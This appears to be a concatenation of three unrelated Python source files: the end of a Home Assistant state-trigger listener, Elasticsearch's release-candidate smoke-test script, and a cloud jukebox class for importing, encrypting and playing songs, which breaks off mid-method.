or (not match_all and old_value == new_value)
):
return
@callback
def call_action():
"""Call action with right context."""
hass.async_run_hass_job(
job,
{
"trigger": {
"platform": platform_type,
"entity_id": entity,
"from_state": from_s,
"to_state": to_s,
"for": time_delta if not time_delta else period[entity],
"attribute": attribute,
"description": f"state of {entity}",
"id": trigger_id,
}
},
event.context,
)
if not time_delta:
call_action()
return
trigger_info = {
"trigger": {
"platform": "state",
"entity_id": entity,
"from_state": from_s,
"to_state": to_s,
}
}
variables = {**_variables, **trigger_info}
try:
period[entity] = cv.positive_time_period(
template.render_complex(time_delta, variables)
)
except (exceptions.TemplateError, vol.Invalid) as ex:
_LOGGER.error(
"Error rendering '%s' for template: %s", automation_info["name"], ex
)
return
def _check_same_state(_, _2, new_st: State):
if new_st is None:
return False
if attribute is None:
cur_value = new_st.state
else:
cur_value = new_st.attributes.get(attribute)
if CONF_FROM in config and CONF_TO not in config:
return cur_value != old_value
return cur_value == new_value
unsub_track_same[entity] = async_track_same_state(
hass,
period[entity],
call_action,
_check_same_state,
entity_ids=entity,
)
unsub = async_track_state_change_event(hass, entity_id, state_automation_listener)
@callback
def async_remove():
"""Remove state listeners async."""
unsub()
for async_remove in unsub_track_same.values():
async_remove()
unsub_track_same.clear()
return async_remove
| |
# Licensed to Elasticsearch under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on
# an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
# Smoke-tests a release candidate
#
# 1. Downloads the tar.gz, deb, RPM and zip file from the staging URL
# 2. Verifies it's sha1 hashes and GPG signatures against the release key
# 3. Installs all official plugins
# 4. Starts one node for tar.gz and zip packages and checks:
# -- if it runs with Java 1.8
# -- if the build hash given is the one that is returned by the status response
# -- if the build is a release version and not a snapshot version
# -- if all plugins are loaded
# -- if the status response returns the correct version
#
# USAGE:
#
# python3 -B ./dev-tools/smoke_test_rc.py --version 2.0.0-beta1 --hash bfa3e47
#
# to also test other plugins try run
#
# python3 -B ./dev-tools/smoke_test_rc.py --version 2.0.0-beta1 --hash bfa3e47 --plugins license,shield,watcher
#
# Note: Ensure the script is run from the elasticsearch top level directory
#
# For testing a release from sonatype try this:
#
# python3 -B dev-tools/smoke_test_rc.py --version 2.0.0-beta1 --hash bfa3e47 --fetch_url https://oss.sonatype.org/content/repositories/releases/
#
import argparse
import tempfile
import os
import signal
import shutil
import urllib
import urllib.request
import hashlib
import time
import socket
import json
import base64
from urllib.parse import urlparse
from prepare_release_candidate import run
from http.client import HTTPConnection
DEFAULT_PLUGINS = ["analysis-icu",
"analysis-kuromoji",
"analysis-phonetic",
"analysis-smartcn",
"analysis-stempel",
"discovery-azure-classic",
"discovery-ec2",
"discovery-file",
"discovery-gce",
"ingest-attachment",
"ingest-geoip",
"ingest-user-agent",
"lang-javascript",
"lang-python",
"mapper-attachments",
"mapper-murmur3",
"mapper-size",
"repository-azure",
"repository-gcs",
"repository-hdfs",
"repository-s3",
"store-smb"]
try:
JAVA_HOME = os.environ['JAVA_HOME']
except KeyError:
raise RuntimeError("""
Please set JAVA_HOME in the env before running release tool
On OSX use: export JAVA_HOME=`/usr/libexec/java_home -v '1.8*'`""")
def java_exe():
path = JAVA_HOME
return 'export JAVA_HOME="%s" PATH="%s/bin:$PATH" JAVACMD="%s/bin/java"' % (path, path, path)
def verify_java_version(version):
s = os.popen('%s; java -version 2>&1' % java_exe()).read()
if ' version "%s.' % version not in s:
raise RuntimeError('got wrong version for java %s:\n%s' % (version, s))
def sha1(file):
with open(file, 'rb') as f:
return hashlib.sha1(f.read()).hexdigest()
def read_fully(file):
with open(file, encoding='utf-8') as f:
return f.read()
def wait_for_node_startup(es_dir, timeout=60, header={}):
print(' Waiting until node becomes available for at most %s seconds' % timeout)
for _ in range(timeout):
conn = None
try:
time.sleep(1)
host = get_host_from_ports_file(es_dir)
conn = HTTPConnection(host, timeout=1)
conn.request('GET', '/', headers=header)
res = conn.getresponse()
if res.status == 200:
return True
except IOError as e:
pass
#that is ok it might not be there yet
finally:
if conn:
conn.close()
return False
def download_and_verify(version, hash, files, base_url, plugins=DEFAULT_PLUGINS):
print('Downloading and verifying release %s from %s' % (version, base_url))
tmp_dir = tempfile.mkdtemp()
try:
downloaded_files = []
print(' ' + '*' * 80)
# here we create a temp gpg home where we download the release key as the only key into
# when we verify the signature it will fail if the signed key is not in the keystore and that
# way we keep the executing host unmodified since we don't have to import the key into the default keystore
gpg_home_dir = os.path.join(tmp_dir, "gpg_home_dir")
os.makedirs(gpg_home_dir, 0o700)
run('gpg --homedir %s --keyserver pool.sks-keyservers.net --recv-key D88E42B4' % gpg_home_dir)
for file in files:
name = os.path.basename(file)
print(' Smoketest file: %s' % name)
url = '%s/%s' % (base_url, file)
print(' Downloading %s' % (url))
artifact_path = os.path.join(tmp_dir, file)
downloaded_files.append(artifact_path)
current_artifact_dir = os.path.dirname(artifact_path)
urllib.request.urlretrieve(url, os.path.join(tmp_dir, file))
sha1_url = ''.join([url, '.sha1'])
checksum_file = artifact_path + ".sha1"
print(' Downloading %s' % (sha1_url))
urllib.request.urlretrieve(sha1_url, checksum_file)
print(' Verifying checksum %s' % (checksum_file))
expected = read_fully(checksum_file)
actual = sha1(artifact_path)
if expected != actual :
raise RuntimeError('sha1 hash for %s doesn\'t match %s != %s' % (name, expected, actual))
gpg_url = ''.join([url, '.asc'])
gpg_file = artifact_path + ".asc"
print(' Downloading %s' % (gpg_url))
urllib.request.urlretrieve(gpg_url, gpg_file)
print(' Verifying gpg signature %s' % (gpg_file))
run('cd %s && gpg --homedir %s --verify %s' % (current_artifact_dir, gpg_home_dir, os.path.basename(gpg_file)))
print(' ' + '*' * 80)
print()
smoke_test_release(version, downloaded_files, hash, plugins)
print(' SUCCESS')
finally:
shutil.rmtree(tmp_dir)
def get_host_from_ports_file(es_dir):
return read_fully(os.path.join(es_dir, 'logs/http.ports')).splitlines()[0]
def smoke_test_release(release, files, hash, plugins):
for release_file in files:
if not os.path.isfile(release_file):
raise RuntimeError('Smoketest failed missing file %s' % (release_file))
tmp_dir = tempfile.mkdtemp()
if release_file.endswith('tar.gz'):
run('tar -xzf %s -C %s' % (release_file, tmp_dir))
elif release_file.endswith('zip'):
run('unzip %s -d %s' % (release_file, tmp_dir))
else:
print(' Skip SmokeTest for [%s]' % release_file)
continue # nothing to do here
es_dir = os.path.join(tmp_dir, 'elasticsearch-%s' % (release))
es_run_path = os.path.join(es_dir, 'bin/elasticsearch')
print(' Smoke testing package [%s]' % release_file)
es_plugin_path = os.path.join(es_dir, 'bin/elasticsearch-plugin')
plugin_names = {}
for plugin in plugins:
print(' Install plugin [%s]' % (plugin))
run('%s; export ES_JAVA_OPTS="-Des.plugins.staging=%s"; %s %s %s' % (java_exe(), hash, es_plugin_path, 'install -b', plugin))
plugin_names[plugin] = True
if 'x-pack' in plugin_names:
headers = { 'Authorization' : 'Basic %s' % base64.b64encode(b"es_admin:foobar").decode("UTF-8") }
es_shield_path = os.path.join(es_dir, 'bin/x-pack/users')
print(" Install dummy shield user")
run('%s; %s useradd es_admin -r superuser -p foobar' % (java_exe(), es_shield_path))
else:
headers = {}
print(' Starting elasticsearch deamon from [%s]' % es_dir)
try:
run('%s; %s -Enode.name=smoke_tester -Ecluster.name=prepare_release -Escript.inline=true -Escript.stored=true -Erepositories.url.allowed_urls=http://snapshot.test* %s -Epidfile=%s -Enode.portsfile=true'
% (java_exe(), es_run_path, '-d', os.path.join(es_dir, 'es-smoke.pid')))
if not wait_for_node_startup(es_dir, header=headers):
print("elasticsearch logs:")
print('*' * 80)
logs = read_fully(os.path.join(es_dir, 'logs/prepare_release.log'))
print(logs)
print('*' * 80)
raise RuntimeError('server didn\'t start up')
try: # we now get / and /_nodes to fetch basic infos like hashes etc and the installed plugins
host = get_host_from_ports_file(es_dir)
conn = HTTPConnection(host, timeout=20)
conn.request('GET', '/', headers=headers)
res = conn.getresponse()
if res.status == 200:
version = json.loads(res.read().decode("utf-8"))['version']
if release != version['number']:
raise RuntimeError('Expected version [%s] but was [%s]' % (release, version['number']))
if version['build_snapshot']:
raise RuntimeError('Expected non snapshot version')
print(' Verify if plugins are listed in _nodes')
conn.request('GET', '/_nodes?plugin=true&pretty=true', headers=headers)
res = conn.getresponse()
if res.status == 200:
nodes = json.loads(res.read().decode("utf-8"))['nodes']
for _, node in nodes.items():
node_plugins = node['plugins']
for node_plugin in node_plugins:
if not plugin_names.get(node_plugin['name'].strip(), False):
raise RuntimeError('Unexpected plugin %s' % node_plugin['name'])
del plugin_names[node_plugin['name']]
if plugin_names:
raise RuntimeError('Plugins not loaded %s' % list(plugin_names.keys()))
else:
raise RuntimeError('Expected HTTP 200 but got %s' % res.status)
else:
raise RuntimeError('Expected HTTP 200 but got %s' % res.status)
finally:
conn.close()
finally:
pid_path = os.path.join(es_dir, 'es-smoke.pid')
if os.path.exists(pid_path): # try reading the pid and kill the node
pid = int(read_fully(pid_path))
os.kill(pid, signal.SIGKILL)
shutil.rmtree(tmp_dir)
print(' ' + '*' * 80)
print()
def parse_list(string):
return [x.strip() for x in string.split(',')]
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='SmokeTests a Release Candidate from S3 staging repo')
parser.add_argument('--version', '-v', dest='version', default=None,
help='The Elasticsearch Version to smoke-tests', required=True)
parser.add_argument('--hash', '-s', dest='hash', default=None, required=True,
help='The hash of the unified release')
parser.add_argument('--plugins', '-p', dest='plugins', default=[], required=False, type=parse_list,
help='A list of additional plugins to smoketest')
parser.add_argument('--fetch_url', '-u', dest='url', default=None,
help='Fetched from the specified URL')
parser.set_defaults(hash=None)
parser.set_defaults(plugins=[])
parser.set_defaults(version=None)
parser.set_defaults(url=None)
args = parser.parse_args()
plugins = args.plugins
version = args.version
hash = args.hash
url = args.url
files = [ x % {'version': version} for x in [
'elasticsearch-%(version)s.tar.gz',
'elasticsearch-%(version)s.zip',
'elasticsearch-%(version)s.deb',
'elasticsearch-%(version)s.rpm'
]]
verify_java_version('1.8')
if url:
download_url = url
else:
download_url = 'https://staging.elastic.co/%s-%s/downloads/elasticsearch' % (version, hash)
download_and_verify(version, hash, files, download_url, plugins=DEFAULT_PLUGINS + plugins)
| |
# ******************************************************************************
# Cloud jukebox
# Copyright Paul Dardeau, SwampBits LLC, 2014
# BSD license -- see LICENSE file for details
#
# (1) create a directory for the jukebox (e.g., ~/jukebox)
#
# This cloud jukebox uses an abstract object storage system.
# (2) copy this source file to $JUKEBOX
# (3) create subdirectory for song imports (e.g., mkdir $JUKEBOX/song-import)
# (4) create subdirectory for song-play (e.g., mkdir $JUKEBOX/song-play)
#
# Song file naming convention:
#
# The-Artist-Name--Album-Name--The-Song-Name.ext
# | | | | |
# | | | | |---- file extension (e.g., 'mp3')
# | | | |
# | | | |---- name of the song (' ' replaced with '-')
# | | |
# | | |---- name of the album (' ' replaced with '-')
# | |
# | |---- double dashes to separate the artist name and song name
# |
# |---- artist name (' ' replaced with '-')
#
# For example, the MP3 version of the song 'Under My Thumb' from artist 'The
# Rolling Stones' from the album 'Aftermath' should be named:
#
# The-Rolling-Stones--Aftermath--Under-My-Thumb.mp3
#
# first time use (or when new songs are added):
# (1) copy one or more song files to $JUKEBOX/song-import
# (2) import songs with command: 'python jukebox_main.py import-songs'
#
# show song listings:
# python jukebox_main.py list-songs
#
# play songs:
# python jukebox_main.py play
#
# ******************************************************************************
import datetime
import os
import os.path
if os.name == 'posix':
import signal
import sys
import time
import zlib
import random
from subprocess import Popen
import aes
import jukebox_db
import file_metadata
import song_metadata
import song_downloader
import utils
import json
g_jukebox_instance = None
def signal_handler(signum, frame):
if signum == signal.SIGUSR1:
if g_jukebox_instance is not None:
g_jukebox_instance.toggle_pause_play()
elif signum == signal.SIGUSR2:
if g_jukebox_instance is not None:
g_jukebox_instance.advance_to_next_song()
class Jukebox:
def __init__(self, jb_options, storage_sys, debug_print=False):
global g_jukebox_instance
g_jukebox_instance = self
self.jukebox_options = jb_options
self.storage_system = storage_sys
self.debug_print = debug_print
self.jukebox_db = None
self.current_dir = os.getcwd()
self.song_import_dir = os.path.join(self.current_dir, 'song-import')
self.playlist_import_dir = os.path.join(self.current_dir, 'playlist-import')
self.song_play_dir = os.path.join(self.current_dir, 'song-play')
self.album_art_import_dir = os.path.join(self.current_dir, 'album-art-import')
self.download_extension = ".download"
self.metadata_db_file = 'jukebox_db.sqlite3'
self.metadata_container = 'music-metadata'
self.playlist_container = 'playlists'
self.album_art_container = 'album-art'
self.song_list = []
self.number_songs = 0
self.song_index = -1
self.audio_player_command_args = []
self.audio_player_popen = None
self.song_play_length_seconds = 20
self.cumulative_download_bytes = 0
self.cumulative_download_time = 0
self.exit_requested = False
self.is_paused = False
self.song_start_time = 0
self.song_seconds_offset = 0
if jb_options is not None and jb_options.debug_mode:
self.debug_print = True
if self.debug_print:
print("self.current_dir = '%s'" % self.current_dir)
print("self.song_import_dir = '%s'" % self.song_import_dir)
print("self.song_play_dir = '%s'" % self.song_play_dir)
def __enter__(self):
# look for stored metadata in the storage system
if self.storage_system is not None and \
self.storage_system.has_container(self.metadata_container) and \
not self.jukebox_options.suppress_metadata_download:
# metadata container exists, retrieve container listing
container_contents = self.storage_system.list_container_contents(self.metadata_container)
# does our metadata DB file exist in the metadata container?
if container_contents is not None and self.metadata_db_file in container_contents:
# download it
metadata_db_file_path = self.get_metadata_db_file_path()
download_file = metadata_db_file_path + ".download"
if self.storage_system.get_object(self.metadata_container, self.metadata_db_file, download_file) > 0:
# have an existing metadata DB file?
if os.path.exists(metadata_db_file_path):
if self.debug_print:
print("deleting existing metadata DB file")
os.remove(metadata_db_file_path)
# rename downloaded file
if self.debug_print:
print("renaming '%s' to '%s'" % (download_file, metadata_db_file_path))
os.rename(download_file, metadata_db_file_path)
else:
if self.debug_print:
print("error: unable to retrieve metadata DB file")
else:
if self.debug_print:
print("no metadata DB file in metadata container")
else:
if self.debug_print:
print("no metadata container in storage system")
self.jukebox_db = jukebox_db.JukeboxDB(self.get_metadata_db_file_path())
if not self.jukebox_db.open():
print("unable to connect to database")
return self
def __exit__(self, exception_type, exception_value, traceback):
if self.jukebox_db is not None:
if self.jukebox_db.is_open():
self.jukebox_db.close()
self.jukebox_db = None
def install_signal_handlers(self):
if os.name == 'posix':
signal.signal(signal.SIGUSR1, signal_handler)
signal.signal(signal.SIGUSR2, signal_handler)
def toggle_pause_play(self):
self.is_paused = not self.is_paused
if self.is_paused:
print("paused")
if self.audio_player_popen is not None:
# capture current song position (seconds into song)
self.audio_player_popen.terminate()
else:
print("resuming play")
def advance_to_next_song(self):
print("advancing to next song")
if self.audio_player_popen is not None:
self.audio_player_popen.terminate()
def get_metadata_db_file_path(self):
return os.path.join(self.current_dir, self.metadata_db_file)
@staticmethod
def unencode_value(encoded_value):
return encoded_value.replace('-', ' ')
@staticmethod
def encode_value(value):
return value.replace(' ', '-')
def components_from_file_name(self, file_name):
pos_extension = file_name.find('.')
if pos_extension > -1:
base_file_name = file_name[0:pos_extension]
else:
base_file_name = file_name
components = base_file_name.split('--')
if len(components) == 3:
encoded_artist = components[0]
encoded_album = components[1]
encoded_song = components[2]
return [self.unencode_value(encoded_artist),
self.unencode_value(encoded_album),
self.unencode_value(encoded_song)]
else:
return None
def artist_from_file_name(self, file_name):
if file_name is not None and file_name:
components = self.components_from_file_name(file_name)
if components is not None and len(components) == 3:
return components[0]
return None
def album_from_file_name(self, file_name):
if file_name is not None and file_name:
components = self.components_from_file_name(file_name)
if components is not None and len(components) == 3:
return components[1]
return None
def song_from_file_name(self, file_name):
if file_name is not None and file_name:
components = self.components_from_file_name(file_name)
if components is not None and len(components) == 3:
return components[2]
return None
def store_song_metadata(self, fs_song):
db_song = self.jukebox_db.retrieve_song(fs_song.fm.file_uid)
if db_song is not None:
if fs_song != db_song:
return self.jukebox_db.update_song(fs_song)
else:
return True # no insert or update needed (already up-to-date)
else:
# song is not in the database, insert it
return self.jukebox_db.insert_song(fs_song)
def store_song_playlist(self, file_name, file_contents):
pl = json.loads(file_contents)
if 'name' in pl.keys():
pl_name = pl['name']
pl_uid = file_name
return self.jukebox_db.insert_playlist(pl_uid, pl_name)
else:
return False
def get_encryptor(self):
# key_block_size = 16 # AES-128
# key_block_size = 24 # AES-192
key_block_size = 32 # AES-256
return aes.AESBlockEncryption(key_block_size,
self.jukebox_options.encryption_key,
self.jukebox_options.encryption_iv)
def container_suffix(self):
suffix = ""
if self.jukebox_options.use_encryption and self.jukebox_options.use_compression:
suffix += "-ez"
elif self.jukebox_options.use_encryption:
suffix += "-e"
elif self.jukebox_options.use_compression:
suffix += "-z"
return suffix
def object_file_suffix(self):
suffix = ""
if self.jukebox_options.use_encryption and self.jukebox_options.use_compression:
suffix = ".egz"
elif self.jukebox_options.use_encryption:
suffix = ".e"
elif self.jukebox_options.use_compression:
suffix = ".gz"
return suffix
def container_for_song(self, song_uid):
if song_uid is None or len(song_uid) == 0:
return None
container_suffix = "-artist-songs" + self.container_suffix()
artist = self.artist_from_file_name(song_uid)
if artist.startswith('A '):
artist_letter = artist[2:3]
elif artist.startswith('The '):
artist_letter = artist[4:5]
else:
artist_letter = artist[0:1]
return artist_letter.lower() + container_suffix
def import_songs(self):
if self.jukebox_db is not None and self.jukebox_db.is_open():
dir_listing = os.listdir(self.song_import_dir)
num_entries = float(len(dir_listing))
progressbar_chars = 0.0
progressbar_width = 40
progresschars_per_iteration = progressbar_width / num_entries
progressbar_char = '#'
bar_chars = 0
if not self.debug_print:
# setup progressbar
sys.stdout.write("[%s]" % (" " * progressbar_width))
sys.stdout.flush()
sys.stdout.write("\b" * (progressbar_width + 1)) # return to start of line, after '['
if self.jukebox_options is not None and self.jukebox_options.use_encryption:
encryption = self.get_encryptor()
else:
encryption = None
cumulative_upload_time = 0
cumulative_upload_bytes = 0
file_import_count = 0
for listing_entry in dir_listing:
full_path = os.path.join(self.song_import_dir, listing_entry)
# ignore it if it's not a file
if os.path.isfile(full_path):
file_name = listing_entry
extension = os.path.splitext(full_path)[1]
if extension:
file_size = os.path.getsize(full_path)
artist = self.artist_from_file_name(file_name)
album = self.album_from_file_name(file_name)
song = self.song_from_file_name(file_name)
if file_size > 0 and artist is not None and album is not None and song is not None:
object_name = file_name + self.object_file_suffix()
fs_song = song_metadata.SongMetadata()
fs_song.fm = file_metadata.FileMetadata()
fs_song.fm.file_uid = object_name
fs_song.album_uid = None
fs_song.fm.origin_file_size = file_size
fs_song.fm.file_time = datetime.datetime.fromtimestamp(os.path.getmtime(full_path))
fs_song.artist_name = artist
fs_song.song_name = song
fs_song.fm.md5_hash = utils.md5_for_file(full_path)
fs_song.fm.compressed = self.jukebox_options.use_compression
fs_song.fm.encrypted = self.jukebox_options.use_encryption
fs_song.fm.object_name = object_name
fs_song.fm.pad_char_count = 0
fs_song.fm.container_name = self.container_for_song(file_name)
# read file contents
file_read = False
file_contents = None
try:
with open(full_path, 'r') as content_file:
file_contents = content_file.read()
file_read = True
except IOError:
print("error: unable to read file %s" % full_path)
if file_read and file_contents is not None:
if file_contents:
# for general purposes, it might be useful or helpful to have
# a minimum size for compressing
if self.jukebox_options.use_compression:
if self.debug_print:
print("compressing file")
file_contents = zlib.compress(file_contents, 9)
if self.jukebox_options.use_encryption:
if self.debug_print:
print("encrypting file")
# the length of the data to encrypt must be a multiple of 16
num_extra_chars = len(file_contents) % 16
if num_extra_chars > 0:
if self.debug_print:
print("padding file for encryption")
num_pad_chars = 16 - num_extra_chars
file_contents += "".ljust(num_pad_chars, ' ')
fs_song.fm.pad_char_count = num_pad_chars
file_contents = encryption.encrypt(file_contents)
# now that we have the data that will be stored, set the file size for
# what's being stored
fs_song.fm.stored_file_size = len(file_contents)
start_upload_time = time.time()
# store song file to storage system
if self.storage_system.put_object(fs_song.fm.container_name,
fs_song.fm.object_name,
file_contents):
end_upload_time = time.time()
upload_elapsed_time = end_upload_time - start_upload_time
cumulative_upload_time += upload_elapsed_time
cumulative_upload_bytes += len(file_contents)
# store song metadata in local database
if not self.store_song_metadata(fs_song):
# we stored the song to the storage system, but were unable to store
# the metadata in the local database. we need to delete the song
# from the storage system since we won't have any way to access it
# since we can't store the song metadata locally.
self.storage_system.delete_object(fs_song.fm.container_name,
fs_song.fm.object_name)
else:
file_import_count += 1
if not self.debug_print:
progressbar_chars += progresschars_per_iteration
if int(progressbar_chars) > bar_chars:
num_new_chars = int(progressbar_chars) - bar_chars
if num_new_chars > 0:
# update progress bar
for j in iter(range(num_new_chars)):
sys.stdout.write(progressbar_char)
sys.stdout.flush()
bar_chars += num_new_chars
if not self.debug_print:
# if we haven't filled up the progress bar, fill it now
if bar_chars < progressbar_width:
num_new_chars = progressbar_width - bar_chars
for j in iter(range(num_new_chars)):
sys.stdout.write(progressbar_char)
sys.stdout.flush()
sys.stdout.write("\n")
if file_import_count > 0:
self.upload_metadata_db()
print("%s song files imported" % file_import_count)
if cumulative_upload_time > 0:
cumulative_upload_kb = cumulative_upload_bytes / 1000.0
print("average upload throughput = %s KB/sec" % (int(cumulative_upload_kb / cumulative_upload_time)))
def song_path_in_playlist(self, song):
return os.path.join(self.song_play_dir, song.fm.file_uid)
def check_file_integrity(self, song):
file_integrity_passed = True
if self.jukebox_options is not None and self.jukebox_options.check_data_integrity:
file_path = self.song_path_in_playlist(song)
if os.path.exists(file_path):
if self.debug_print:
print("checking integrity for %s" % song.fm.file_uid)
playlist_md5 = utils.md5_for_file(file_path)
if playlist_md5 == song.md5:
if self.debug_print:
print("integrity check SUCCESS")
file_integrity_passed = True
else:
print("file integrity check failed: %s" % song.fm.file_uid)
file_integrity_passed = False
else:
# file doesn't exist
print("file doesn't exist")
file_integrity_passed = False
else:
if self.debug_print:
print("file integrity bypassed, no jukebox options or check integrity not turned on")
return file_integrity_passed
def batch_download_start(self):
self.cumulative_download_bytes = 0
self.cumulative_download_time = 0
def batch_download_complete(self):
if not self.exit_requested:
if self.cumulative_download_time > 0:
cumulative_download_kb = self.cumulative_download_bytes / 1000.0
print("average download throughput = %s KB/sec" % (
int(cumulative_download_kb / self.cumulative_download_time)))
self.cumulative_download_bytes = 0
self.cumulative_download_time = 0
def download_song(self, song):
if self.exit_requested:
return False
if song is not None:
file_path = self.song_path_in_playlist(song)
download_start_time = time.time()
song_bytes_retrieved = self.storage_system.retrieve_file(song.fm, self.song_play_dir)
if self.exit_requested:
return False
if self.debug_print:
print("bytes retrieved: %s" % song_bytes_retrieved)
if song_bytes_retrieved > 0:
download_end_time = time.time()
download_elapsed_time = download_end_time - download_start_time
self.cumulative_download_time += download_elapsed_time
self.cumulative_download_bytes += song_bytes_retrieved
# are we checking data integrity?
# if so, verify that the storage system retrieved the same length that has been stored
if self.jukebox_options is not None and self.jukebox_options.check_data_integrity:
if self.debug_print:
print("verifying data integrity")
if song_bytes_retrieved != song.stored_file_size:
print("error: data integrity check failed for '%s'" % file_path)
return False
# is it encrypted? if so, unencrypt it
encrypted = song.fm.encrypted
compressed = song.fm.compressed
if encrypted or compressed:
try:
with open(file_path, 'rb') as content_file:
file_contents = content_file.read()
except IOError:
print("error: unable to read file %s" % file_path)
return False
if encrypted:
encryption = self.get_encryptor()
file_contents = encryption.decrypt(file_contents)
if compressed:
file_contents = zlib.decompress(file_contents)
# re-write out the uncompressed, unencrypted file contents
try:
with open(file_path, 'wb') as content_file:
content_file.write(file_contents)
except IOError:
print("error: unable to write unencrypted/uncompressed file '%s'" % file_path)
return False
if self.check_file_integrity(song):
return True
else:
# we retrieved the file, but it failed our integrity check
# if file exists, remove it
if os.path.exists(file_path):
os.remove(file_path)
return False
def play_song(self, song_file_path):
if os.path.exists(song_file_path):
print("playing %s" % song_file_path)
if self.audio_player_command_args:
cmd_args = self.audio_player_command_args[:]
cmd_args.append(song_file_path)
exit_code = -1
started_audio_player = False
try:
audio_player_proc = Popen(cmd_args)
if audio_player_proc is not None:
started_audio_player = True
self.song_start_time = time.time()
self.audio_player_popen = audio_player_proc
exit_code = audio_player_proc.wait()
self.audio_player_popen = None
except OSError:
# audio player not available
self.audio_player_command_args = []
self.audio_player_popen = None
exit_code = -1
# if the audio player failed or is not present, just sleep
# for the length of time that audio would be played
if not started_audio_player and exit_code != 0:
time.sleep(self.song_play_length_seconds)
else:
# we don't know about an audio player, so simulate a
# song being played by sleeping
time.sleep(self.song_play_length_seconds)
if not self.is_paused:
# delete the song file from the play list directory
os.remove(song_file_path)
else:
print("song file doesn't exist: '%s'" % song_file_path)
with open("404.txt", "a+") as f:
f.write("%s\n" % song_file_path)
def download_songs(self):
# scan the play list directory to see if we need to download more songs
dir_listing = os.listdir(self.song_play_dir)
song_file_count = 0
for listing_entry in dir_listing:
full_path = os.path.join(self.song_play_dir, listing_entry)
if os.path.isfile(full_path):
extension = os.path.splitext(full_path)[1]
if extension and extension != self.download_extension:
song_file_count += 1
file_cache_count = self.jukebox_options.file_cache_count
if song_file_count < file_cache_count:
dl_songs = []
# start looking at the next song in the list
check_index = self.song_index + 1
for j in iter(range(self.number_songs)):
if check_index >= self.number_songs:
check_index = 0
if check_index != self.song_index:
si = self.song_list[check_index]
file_path = self.song_path_in_playlist(si)
if not os.path.exists(file_path):
dl_songs.append(si)
if len(dl_songs) >= file_cache_count:
break
check_index += 1
if dl_songs:
download_thread = song_downloader.SongDownloader(self, dl_songs)
download_thread.start()
def play_songs(self, shuffle=False, artist=None, album=None):
self.song_list = self.jukebox_db.retrieve_songs(artist, album)
if self.song_list is not None:
self.number_songs = len(self.song_list)
if self.number_songs == 0:
print("no songs in jukebox")
sys.exit(0)
# does play list directory exist?
if not os.path.exists(self.song_play_dir):
if self.debug_print:
print("song-play directory does not exist, creating it")
os.makedirs(self.song_play_dir)
else:
# play list directory exists, delete any files in it
if self.debug_print:
print("deleting existing files in song-play directory")
for theFile in os.listdir(self.song_play_dir):
file_path = os.path.join(self.song_play_dir, theFile)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
except OSError:
pass
self.song_index = 0
self.install_signal_handlers()
if sys.platform == "darwin":
self.audio_player_command_args = ["afplay"]
#self.audio_player_command_args.extend(["-t", str(self.song_play_length_seconds)])
elif os.name == "posix":
self.audio_player_command_args = ["mplayer", "-nolirc", "-really-quiet"]
#self.audio_player_command_args.extend(["-endpos", str(self.song_play_length_seconds)])
elif sys.platform == "win32":
# we really need command-line support for /play and /close arguments. unfortunately,
# this support used to be available in the built-in windows media player, but is
# no longer present.
# self.audio_player_command_args = ["C:\Program Files\Windows Media Player\wmplayer.exe"]
self.audio_player_command_args = ["C:\\Program Files\\MPC-HC\\mpc-hc64.exe",
"/play", "/close", "/minimized"]
else:
self.audio_player_command_args = []
print("downloading first song...")
if shuffle:
self.song_list = random.sample(self.song_list, len(self.song_list))
try:
if self.download_song(self.song_list[0]):
print("first song downloaded. starting playing now.")
with open("jukebox.pid", "w") as f:
f.write('%d\n' % os.getpid())
while True:
if not self.exit_requested:
if not self.is_paused:
self.download_songs()
self.play_song(self.song_path_in_playlist(self.song_list[self.song_index]))
if not self.is_paused:
self.song_index += 1
if self.song_index >= self.number_songs:
self.song_index = 0
else:
time.sleep(1)
os.remove("jukebox.pid")
else:
print("error: unable to download songs")
sys.exit(1)
except KeyboardInterrupt:
print("\nexiting jukebox")
os.remove("jukebox.pid")
self.exit_requested = True
def show_list_containers(self):
if self.storage_system is not None:
if self.storage_system.list_containers is not None:
for container_name in self.storage_system.list_containers:
print(container_name)
def show_listings(self):
if self.jukebox_db is not None:
self.jukebox_db.show_listings()
def show_artists(self):
if self.jukebox_db is not None:
self.jukebox_db.show_artists()
def show_genres(self):
if self.jukebox_db is not None:
self.jukebox_db.show_genres()
def show_albums(self):
if self.jukebox_db is not None:
self.jukebox_db.show_albums()
def read_file_contents(self, file_path, allow_encryption=True):
file_read = False
file_contents = None
pad_chars = 0
try:
with open(file_path, 'r') as content_file:
file_contents = content_file.read()
file_read = True
except IOError:
print("error: unable to read file %s" % file_path)
if file_read and file_contents is not None:
if file_contents:
# for general purposes, it might be useful or helpful to have
# a minimum size for compressing
if self.jukebox_options.use_compression:
if self.debug_print:
print("compressing file")
file_contents = zlib.compress(file_contents, 9)
if allow_encryption and self.jukebox_options.use_encryption:
if self.debug_print:
print("encrypting file")
# the length of the data to encrypt must be a multiple of 16
num_extra_chars = len(file_contents) % 16
if num_extra_chars > 0:
if self.debug_print:
print("padding file for encryption")
pad_chars = 16 - num_extra_chars
file_contents += "".ljust(pad_chars, ' ')
file_contents = encryption.encrypt(file_contents)
return file_read, file_contents, pad_chars
def upload_metadata_db(self):
metadata_db_upload = False
if not self.storage_system.has_container(self.metadata_container):
have_metadata_container = self.storage_system.create_container(self.metadata_container)
else:
have_metadata_container = True
if have_metadata_container:
if self.debug_print:
print("uploading metadata db file to storage system")
self.jukebox_db.close()
self.jukebox_db = None
db_file_contents = ''
with open(self.get_metadata_db_file_path(), 'r') as db_file:
db_file_contents = db_file.read()
metadata_db_upload = self.storage_system.put_object(self.metadata_container,
self.metadata_db_file,
db_file_contents)
if self.debug_print:
if metadata_db_upload:
print("metadata db file uploaded")
else:
print("unable to upload metadata db file")
return metadata_db_upload
def import_playlists(self):
if self.jukebox_db is not None and self.jukebox_db.is_open():
file_import_count = 0
dir_listing = os.listdir(self.playlist_import_dir)
if len(dir_listing) == 0:
print("no playlists found")
return
if not self.storage_system.has_container(self.playlist_container):
have_container = self.storage_system.create_container(self.playlist_container)
else:
